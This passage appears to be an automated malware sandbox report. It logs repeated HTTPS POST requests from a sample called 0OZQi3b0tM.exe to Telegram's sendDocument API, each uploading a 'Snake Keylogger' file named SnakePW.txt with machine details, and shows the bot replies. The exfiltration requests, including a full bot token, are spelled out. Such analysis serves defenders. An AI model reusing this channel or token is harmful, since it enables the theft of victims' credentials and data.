                            2022-06-26 07:33:48 UTC273OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 64 64 64 32 39 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fddd29b8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:48 UTC274INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:48 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:48 UTC274INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66929,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228828,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            163192.168.2.550018149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:48 UTC275OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fe309bc3
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:48 UTC275OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 65 33 30 39 62 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fe309bc3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:48 UTC276INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:48 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:48 UTC276INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66930,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228828,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            164192.168.2.550019149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:49 UTC276OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756fe6771e4
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:49 UTC277OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 65 36 37 37 31 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756fe6771e4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:49 UTC277INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:49 GMT
                            Content-Type: application/json
                            Content-Length: 505
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:49 UTC278INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66931,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228829,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            165192.168.2.550020149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:50 UTC278OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ff000861
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:50 UTC278OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 66 30 30 30 38 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ff000861Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:50 UTC279INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:50 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:50 UTC279INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66932,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228830,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            166192.168.2.550021149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:50 UTC280OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ff3ba338
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:50 UTC280OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 66 33 62 61 33 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ff3ba338Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:50 UTC281INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:50 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:50 UTC281INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66934,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228830,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            167192.168.2.550022149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:50 UTC282OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ff80c6dd
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:50 UTC282OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 66 38 30 63 36 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ff80c6ddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:51 UTC282INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:51 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:51 UTC283INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66935,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228831,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            168192.168.2.550023149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:51 UTC283OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ffb53c00
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:51 UTC284OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 66 62 35 33 63 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ffb53c00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:51 UTC284INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:51 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:51 UTC284INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66936,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228831,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            169192.168.2.550025149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:51 UTC285OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757000186aa
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:51 UTC285OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 30 30 31 38 36 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757000186aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:52 UTC286INHTTP/1.1 200 OK
